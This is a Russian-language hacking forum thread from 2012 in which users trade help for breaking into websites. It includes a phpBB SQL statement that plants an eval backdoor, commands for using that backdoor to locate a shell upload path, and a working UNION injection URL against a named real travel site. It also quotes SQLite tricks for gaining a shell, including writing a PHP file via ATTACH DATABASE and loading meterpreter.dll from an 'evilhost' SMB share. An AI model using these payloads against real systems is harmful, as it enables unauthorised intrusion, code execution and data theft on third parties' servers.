Warning: pg_query(): Query failed: ERROR: syntax error at or near "LIMIT" LINE 1: SELECT name FROM web_area.menu WHERE id= LIMIT 1 ^ in /srv/www/htdocs/!sites/index.php on line 246 Query failed: ERROR: syntax error at or near "LIMIT" LINE 1: SELECT name FROM web_area.menu WHERE id= LIMIT 1 ^


Минимум - раскрытие путей, максимум - возможная инъекция в LIMIT 1,[inject]. Но надо смотреть.

M1ks
01.12.2012, 17:05
Помогите.

выполнил sql запрос как написано тут /showpost.php?p=2064084&postcount=25

Теперь хочу узнать путь, куда залить шелл, помогите с php запросом, чтоб выполнил ls или просто узнать путь

smirk
01.12.2012, 17:30
M1ks said:
Помогите.
выполнил sql запрос как написано тут /showpost.php?p=2064084&postcount=25
Теперь хочу узнать путь, куда залить шелл, помогите с php запросом, чтоб выполнил ls или просто узнать путь


ну как залить шелл там пример есть, а путь узнаешь сделав запрос echo realpath("."); ну или в phpinfo посмотреть.

qaz
01.12.2012, 20:34
smirk said:
ну как залить шелл там пример есть, а путь узнаешь сделав запрос echo realpath("."); ну или в phpinfo посмотреть.


а можно узнать где такой запрос сделать? майскул уже научилась выполнять пхп скрипты?

smirk
01.12.2012, 21:08
qaz said:
а можно узнать где такой запрос сделать? майскул уже научилась выполнять пхп скрипты?


ну если б вы внимательно читали пост M1ks, то не задавали бы такой "умный" вопрос.

Он написал, что сделал sql запрос


UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;


из этого поста /showpost.php?p=2064084&postcount=25

Теперь ему надо залить шелл, а путь не знает


M1ks said:
Теперь хочу узнать путь, куда залить шелл, помогите с php запросом, чтоб выполнил ls или просто узнать путь


по скольку он сделал этот sql запрос, можно узнать путь: profile.php?mode=editprofile&c=echo realpath("."); или вывести инфу пхп mode=editprofile&c=phpinfo(); и там смотреть путь.

nijat11
04.12.2012, 00:33
доброго времени суток товарищи. скажите пожалуйста есть ли тут инъекция http://www.swtravel.az/index.php?ind=newsfull&id=118' если да то направьте на правильном пути , а то я не смог количество колонок подобрать

AC//DC
04.12.2012, 01:30
nijat11 said:
доброго времени суток товарищи. скажите пожалуйста есть ли тут инъекция http://www.swtravel.az/index.php?ind=newsfull&id=118' если да то направьте на правильном пути , а то я не смог количество колонок подобрать


http://www.swtravel.az/index.php?stype=a&slevel=1&sid=-11%20union%20select%20@@version,2,3--

Pirotexnik
04.12.2012, 01:45
инъекция в SQLite. Обычная UNION-based.

Никогда с ними не сталкивался. Таблы вытянул из sqlite_master. Как вытянуть колонки?

Читал про какуй-то альтернативный метод залития шелла. LOAD_EXTENSION()

Но не совсем понял, как он работает. Дайте доков по сабжу.

BigBear
04.12.2012, 07:11
Pirotexnik said:
инъекция в SQLite. Обычная UNION-based.
Никогда с ними не сталкивался. Таблы вытянул из
sqlite_master
. Как вытянуть
колонки
?
Читал про какуй-то альтернативный метод залития шелла. LOAD_EXTENSION()
Но не совсем понял, как он работает. Дайте доков по сабжу.


2 способа получения шелла на SQLite

Getting Shell Trick 1 - ATTACH DATABASE

What it says on the tin - lets you attach another database for your querying pleasure. Attach another known db on the filesystem that contains interesting stuff - e.g. a configuration database. Better yet - if the designated file doesn't exist, it will be created. You can create this file anywhere on the filesystem that you have write access to. PHP example:

?id=bob’; ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;--

Then of course you can just visit lol.php?cmd=id and enjoy code exec! This requires stacked queries to be a goer.

Теперь по-русски. Приведённый запрос пытается подключить дополнительную БД ( указанную в файле /var/www/lol.php ) в твой запрос к БД. Если этот файл отсутствует, он автоматически создастся - то, что нам и надо.

Зависимости:

MQ=off

Full_path_disclosure=1

Getting Shell Trick 2 - SELECT load_extension

Takes two arguments:

A library (.dll for Windows, .so for NIX)

An entry point (SQLITE_EXTENSION_INIT1 by default)

This is great because

This technique doesn't require stacked queries

The obvious - you can load a DLL right off the bat (meterpreter.dll?

Unfortunately, this component of SQLite is disabled in the libraries by default. SQLite devs saw the exploitability of this and turned it off. However, some custom libraries have it enabled - for example, one of the more popular Windows ODBC drivers. To make this even better, this particular injection works with UNC paths - so you can remotely load a nasty library over SMB (provided the target server can speak SMB to the Internets). Example:

?name=123 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter .dll','DllMain');--

В этом примере используется Samba протокол для доступа к хосту злоумышленника, где в качестве плагина для SQLite скачаивает "ядовитую" начинку. Тут нужно обратить внимание с какой ОС Вы имеете дело - либо Windows (тогда расширение у файла должно быть .dll ), либо Unix (расширение .so соответственно).

Proof = _ttps://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet

zloy_fantom
04.12.2012, 12:31
Добрый день, помогите новичку

Нашел directory traversal на сайте, прочитал файл /etc/passwd, (пароли в /etc/shadow не прочитал), нашел httpd.conf, посмотрел реврайт рулы, список виртуальных хостов и всякие другие дефолтные файлы. Прочитал /bin/sh, а вот как его запустить на выполнение? Или хотя-бы как-то посмотреть дерево каталогов и файлов. Короче, уткнулся в то, что не могу /bin/sh запустить на выполнение, но подозреваю, что это можно сделать, ведь его содержимое я прочитал.

Спасибо

BigBear
04.12.2012, 12:53
zloy_fantom said:
Добрый день, помогите новичку
Нашел directory traversal на сайте, прочитал файл /etc/passwd, (пароли в /etc/shadow не прочитал), нашел httpd.conf, посмотрел реврайт рулы, список виртуальных хостов и всякие другие дефолтные файлы. Прочитал /bin/sh, а вот как его запустить на выполнение? Или хотя-бы как-то посмотреть дерево каталогов и файлов. Короче, уткнулся в то, что не могу /bin/sh запустить на выполнение, но подозреваю, что это можно сделать, ведь его содержимое я прочитал.
Спасибо


Если у тебя права только на чтение файлов, то единственное что ты можешь делать - читать файлы